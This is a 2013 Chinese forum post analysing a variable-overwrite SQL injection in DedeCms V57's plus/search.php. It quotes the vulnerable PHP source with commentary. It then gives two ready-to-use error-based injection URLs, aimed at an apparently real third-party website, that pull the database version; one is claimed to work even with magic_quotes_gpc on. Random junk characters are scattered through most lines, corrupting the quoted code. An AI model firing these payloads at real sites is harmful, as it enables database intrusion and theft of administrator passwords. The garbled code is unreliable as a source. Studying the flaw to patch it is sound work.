找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2259|回复: 0
打印 上一主题 下一主题

DedeCms V57 plus/search.php文件SQL注射

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:18:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.( S  u2 d8 k/ F" h# O) f/ s
作者: c4rp3nt3r@0x50sec.org
" b; m5 L+ {, ]+ bDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
) P* ?  p% H/ c8 p0 ~ $ H, ?3 ]( ^8 c& k
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
' A. i# u4 V( J6 o% \5 u
4 Q; [1 K- w/ X3 _: u5 {============* Z# U* V4 A% n+ N
( G# T) N0 x9 v# o  E
( l6 U8 J& b0 d( {3 E
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.: B2 Q( j+ s& A0 E; Q
/ ?# A% x6 _" S, L" \# {5 t
require_once(dirname(__FILE__).”/../include/common.inc.php”);& H; d+ V9 ~8 r+ v6 C4 `
require_once(DEDEINC.”/arc.searchview.class.php”);8 J/ g" W9 Y0 a
. S* z, O8 `9 w
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;+ ^% R2 T( d* c5 ~: _$ p3 ]7 Q
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
2 r# j5 e- E) H8 t0 m) d. F$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
6 p1 q' l6 k8 K( S) u" x$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
$ {0 C0 u4 s# o) D) c$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
9 e. N9 c- H* k) U3 v- J , }. ?) T! l9 }1 {' ?, h
if(!isset($orderby)) $orderby=”;' S  S3 c* \8 W$ B- E  E
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);& G. v$ B. B2 d- z$ e9 n
9 I1 q! U% T; z/ t# a0 T$ E

: {, U5 Z, [  T  b* a/ gif(!isset($searchtype)) $searchtype = ‘titlekeyword’;
. |: N( F6 ]$ i4 j! welse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);$ e/ D/ W4 n# H
# l, J0 q5 _6 i  Q, _1 U
if(!isset($keyword)){$ c( \# O2 H9 A0 O) O) i, w
    if(!isset($q)) $q = ”;  U$ G* [5 ]2 e9 v' X
    $keyword=$q;' U# K7 [  U* I( Y
}5 y3 h9 t# L* X# r) ~( O4 J# Z8 Z
* o+ H2 W- k& G7 R3 `6 |: l2 P# h
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));5 r8 O2 E* l$ t3 S6 H
8 F' ^; L7 p; r( _& V$ Q
//查找栏目信息
" w- f$ E- C+ i) H. tif(empty($typeid))
- f& ?2 d) H  R- I, C0 ~7 _{" w' U% r/ a2 f: u
    $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;4 c* |' Q1 c. q: @
    if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )0 n! R# h7 P' j8 e, A; `3 N
    {
2 g/ S9 v2 l) `3 p1 l4 n        $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);1 Z! y8 B% y+ M# _* y" {8 q
        fwrite($fp, “<”.”?php\r\n”);+ h& a0 S8 W+ ]( z6 F
        $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);2 H( \" k8 d8 R% _& A, `, |
        $dsql->Execute();
$ n+ p7 w  r$ y6 P0 _8 A/ E        while($row = $dsql->GetArray())
8 _! ]1 c& Y% \        {
& ]; M, ^0 b$ s  [! Z$ P) A            fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);- x) w4 _1 X- `$ M* B0 @, _1 D" [1 A
        }
2 k; ~" W0 S1 K( s        fwrite($fp, ‘?’.'>’);0 I; Y- z( S6 C
        fclose($fp);
9 K! L% F* ~; B2 Y) u! I    }
5 u. n. h4 K4 D) p( d. N  \    //引入栏目缓存并看关键字是否有相关栏目内容" P) v3 r( t2 W, o9 I
    require_once($typenameCacheFile);
: ]; H# D* k* j: j//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
4 k# Y  h6 z0 U$ ]6 F; v, [//
; {, R2 b7 T7 \2 k4 D; S    if(isset($typeArr) && is_array($typeArr))9 w. D% X3 k5 ]$ ~# R7 w" p
    {& S& o3 p. S$ \9 }% b1 l( w  \& Q7 @
        foreach($typeArr as $id=>$typename)9 Q1 o3 ?0 X2 m6 r: ^9 ~: d
        {/ p( n6 Q: f  i# b
5 E$ e, Q. F: ], z9 s- \  }2 F
            <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font>  //这个地方要绕过% F7 W- j/ W' e# F5 z
            if($keyword != $keywordn)' E3 N( U. v9 R8 M0 W- H  `
            {
1 Y  I$ Q- I6 G, ]$ D7 z                $keyword = $keywordn;
" b$ c1 e* @3 |* ]8 Q% ]  ]                <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设5 Y! _8 G( k: }3 d
                break;
& ?  p; a5 o1 d) e" u! S. {6 S            }" i5 w% \# X3 F: x- h+ t% M" k4 X" K
        }
, {8 Z) P$ W+ R    }
# ^( B1 N/ J( ^2 h6 ]  b}
+ c/ q/ W% O. x. j+ o: e# U& c  `然后plus/search.php文件下面定义了一个 Search类的对象 .
, ^. _2 @* w4 I3 E( j- _6 i在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类." c9 d5 @! c' s* n9 Z0 M
$this->TypeLink = new TypeLink($typeid);" E6 F6 D9 L) R. \( p
1 F5 O, O# b% B$ R
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.# L" q  c& O* e3 T1 j$ J
. W4 N3 @" v* z
class TypeLink
9 G. w' w: |1 N+ u{+ @; u; U% B9 n8 u7 X5 r/ s3 R9 u
    var $typeDir;
' p. R+ x8 k% c5 O    var $dsql;+ P; x2 T9 j% ]% j% F1 Y
    var $TypeID;2 \+ f" W! S/ R7 T; u
    var $baseDir;
4 n# a4 c9 ]3 }% |# g5 q; J    var $modDir;
3 M. c4 ]+ I$ Y( {2 T: d$ S/ J6 }    var $indexUrl;) L' n! G5 {1 q3 a' [( _5 f
    var $indexName;) f0 e6 _( H: O  l
    var $TypeInfos;
( ?& s% L" Z: d+ c0 u+ t) P+ T, d    var $SplitSymbol;
+ Y& X& d3 g3 _8 ~8 v& \, Y    var $valuePosition;
, O3 J  C- l) J' k% \- A  V    var $valuePositionName;8 u6 I9 k5 c6 v" v  i/ [
    var $OptionArrayList;//构造函数///////$ a1 o# W% x, D! e' A
    //php5构造函数
$ X4 B& C0 Z5 k6 G    function __construct($typeid)6 A+ k0 e& D9 E" N: j- b; F2 a2 v
    {& {# C) N& S; C8 I. U
        $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
2 i, f. z: N0 @3 P0 p! C6 ^& p        $this->indexName = $GLOBALS['cfg_indexname'];
* g2 |' |4 X1 A4 J# y. Y        $this->baseDir = $GLOBALS['cfg_basedir'];7 {- r! `  W  p8 ]7 S+ n5 ?8 h. M
        $this->modDir = $GLOBALS['cfg_templets_dir'];
6 B& I( O1 E- e/ `" T( h6 `        $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
( e* f# m% E; e5 N7 @        $this->dsql = $GLOBALS['dsql'];" H. ~- X6 M7 J& @' V
        $this->TypeID = $typeid;
8 u, f4 P& A) M+ j7 J# \6 D        $this->valuePosition = ”;% Q5 b- o7 S8 [. L9 d
        $this->valuePositionName = ”;3 Z- G7 D4 O# \
        $this->typeDir = ”;
8 y! I7 P( h6 @" j        $this->OptionArrayList = ”;5 n: Y5 b% ?$ i

) \6 _5 P& j6 w' P" U        //载入类目信息% p! m3 X( i. ]& w3 M

  b8 r' J/ d3 Z1 d        <font color=”Red”>$query = “SELECT tp.*,ch.typename as5 y/ Q7 q$ _. i1 [
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join/ N9 Q, A$ D' p% H
`#@__channeltype` ch
# ]/ N  ]0 j; L3 E        on ch.id=tp.channeltype  WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
% \  B! @% M9 C
5 {" g! A4 u, u; a. T+ F, f) S        if($typeid > 0)- y# N7 L4 g* I' X. X: A
        {
6 L$ k3 y$ s# V$ H% ]            $this->TypeInfos = $this->dsql->GetOne($query);
9 H* N! t2 w# T* i4 O' T利用代码一 需要 即使magic_quotes_gpc = Off& q( N4 Y) u* y8 G

1 k9 d6 Z/ ~9 A2 bwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
. K3 U) U, J. [% h! }, A" l6 w( R 5 l# ?* r: j+ N- {5 O* W
这只是其中一个利用代码… Search 类的构造函数再往下) a' t2 L" E: }0 C! `

+ |9 i* b8 }  S- K……省略
1 f5 U, v  ]; z$this->TypeID = $typeid;
6 S- D4 v& d, i' v: f( K……省略* k' `# i" l: A# s5 r( g9 f/ l
if($this->TypeID==”0″){
# p3 r0 y0 E  y4 I3 l            $this->ChannelTypeid=1;0 q" a9 w, c6 Z6 z7 ^) a) |3 b+ T3 y
        }else{
; a, g7 K. G, g& N9 D8 _3 p: I, ~            $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲( i' _1 C8 T0 ?5 u0 D, L9 A; J" O% A
//现在不鸡肋了吧亲…3 u9 \$ ]& R/ d5 ]' z4 e3 i+ a
            $this->ChannelTypeid=$row['channeltype'];" [+ N9 [* a8 k% O7 h' x
# }% H8 ~. Y- T$ N% s5 E3 a" X0 L& L
        }
. m1 i& s: w' r, u5 [# r利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
& }; v3 _3 o0 [
$ }/ Y9 [* z  m8 ^www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
! ~! B! _( f3 S% w. I9 l, s % ~6 V9 g* i- g( F/ i- e$ C& b
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站- L# m6 K, b! k, d4 b  X( m& V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表